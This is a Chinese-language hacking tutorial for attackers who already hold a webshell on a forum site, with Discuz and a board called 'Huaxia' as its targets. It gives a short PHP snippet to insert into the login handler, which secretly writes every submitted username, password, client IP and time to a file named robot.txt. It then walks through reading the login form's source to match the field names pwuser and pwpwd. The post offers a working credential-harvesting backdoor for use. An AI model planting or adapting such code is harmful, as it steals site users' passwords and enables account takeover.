拿到webshell之後,想要進一步滲透,諸如discuz的密碼,不是直接用md5加密的,破解難度很大。以前幫大頭寫過一次,昨天小豬大哥正好用到,就又寫了一遍。代碼比較簡單,就幾句話,我把原理說的詳細點,照顧下對php不太了解有朋友。
if($_POST[loginsubmit]!=){ //判斷是否點了登陸按鈕
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結果寫入一個文件
下面簡單分析一下,以華夏的登陸頁面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復制了關鍵代碼過來.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action後面的值即是表單提交的地址,裡面會處理登陸,比如判斷密碼是不是正確什麼的 method為POST,所以用$_POST接收。
。。。。強大的省略號。。。。。。
<TR>
<TD height=40>賬號(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]